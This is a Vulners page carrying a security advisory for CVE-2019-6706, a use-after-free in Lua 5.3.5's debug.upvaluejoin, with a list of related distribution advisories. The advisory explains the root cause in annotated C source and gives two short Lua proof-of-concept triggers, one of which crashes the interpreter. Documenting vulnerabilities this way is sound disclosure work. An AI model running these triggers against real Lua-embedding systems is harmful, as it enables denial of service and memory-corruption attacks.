Vulners
Lucene search
Lua 5.3.5 - 'debug.upvaluejoin' Use After Free
| Reporter | Title | Published | Views | Family All 75 |
|---|---|---|---|---|
 | Lua 5.3.5 - debug.upvaluejoin Use After Free Exploit | 25 Jan 201900:00 | – | zdt |
 | AlmaLinux 8 : lua (ALSA-2019:3706) | 9 Feb 202200:00 | – | nessus |
| CentOS 8 : lua (CESA-2019:3706) | 29 Jan 202100:00 | – | nessus |
| Debian dla-3469 : liblua5.3-0 - security update | 23 Jun 202300:00 | – | nessus |
| EulerOS 2.0 SP8 : lua (EulerOS-SA-2019-1776) | 25 Jul 201900:00 | – | nessus |
| EulerOS Virtualization for ARM 64 3.0.3.0 : lua (EulerOS-SA-2019-2339) | 3 Dec 201900:00 | – | nessus |
| Fedora 29 : lua (2019-ee57bda7ae) | 30 Jan 201900:00 | – | nessus |
| openSUSE Security Update : lua53 (openSUSE-2019-175) | 15 Feb 201900:00 | – | nessus |
| Oracle Linux 8 : lua (ELSA-2019-3706) | 7 Sep 202300:00 | – | nessus |
| Photon OS 3.0: Lua PHSA-2019-3.0-0036 | 23 Jul 202400:00 | – | nessus |
10
# Exploit Title: Lua 5.3.5
# Exploit Author: Fady Mohamed Osman (https://twitter.com/fady_othman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Blog : https://blog.fadyothman.com/
# Date: Jan. 10th 2019
# Vendor Homepage: https://www.lua.org/
# Software Link: https://www.lua.org/ftp/lua-5.3.5.tar.gz
# Version: 5.3.5
# CVE ID: CVE-2019-6706
During a fuzz session using "AFL", I found a heap use after free in lua
5.3.5, after analysis of the crash I found the root cause of the
vulnerability, here's the details.
The function `lua_upvaluejoin` in file lapi.c at line 1287 suffers from a
use after free bug when supplied the same function for parameter f1 and f2
and the same upvalue index, additionally I found that the bug is only
triggered when the upvalue is closed, this happens because the
`luaC_upvdeccount` function found in file lgc.c at line 678 will decrement
the refcount and then free the upvalue if the refcount is zero and if the
upvalue is closed.
See the comments below for more explanation.
--------------
LUA_API void lua_upvaluejoin (lua_State *L, int fidx1, int n1,
int fidx2, int n2) {
LClosure *f1;
UpVal **up1 = getupvalref(L, fidx1, n1, &f1);
UpVal **up2 = getupvalref(L, fidx2, n2, NULL);
luaC_upvdeccount(L, *up1); //Will delete up1
*up1 = *up2; //up1 is up2 because it's the same upvalue and now it's
freed.
(*up1)->refcount++; //up1 is freed, yet it's used here.
if (upisopen(*up1)) (*up1)->u.open.touched = 1;
luaC_upvalbarrier(L, *up1);
}
--------------
- To trigger the bug simply use a lua program like this (this one will
crash):
--
f=load(function() end)
interesting={}
interesting[0]=string.rep("A",512)
debug.upvaluejoin(f,1,f,1)
---
- Another program that will not crash (unless you compile with
-fsanitize=address):
---
function w()
local x = {}
f = function() print(x) end
end
w()
debug.upvaluejoin(f,2,f,2)
---
If you want a fix you can use the patch provided here:
http://lua.2524044.n2.nabble.com/CVE-2019-6706-use-after-free-in-lua-upvaluejoin-function-tc7685575.html
Timeline:
- Jan 10th 2019 : Vulnerability discovered and reported to lua mailing list.
- Jan 23rd 2019 : CVE Identifier obtained.
- Jan 25th 2019 : Fix is suggested by Matěj Cepl.
Refrences:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6706
https://security-tracker.debian.org/tracker/CVE-2019-6706
https://vuldb.com/?id.130228Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Jan 2019 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 25
CVSS 3.17.5
EPSS0.00904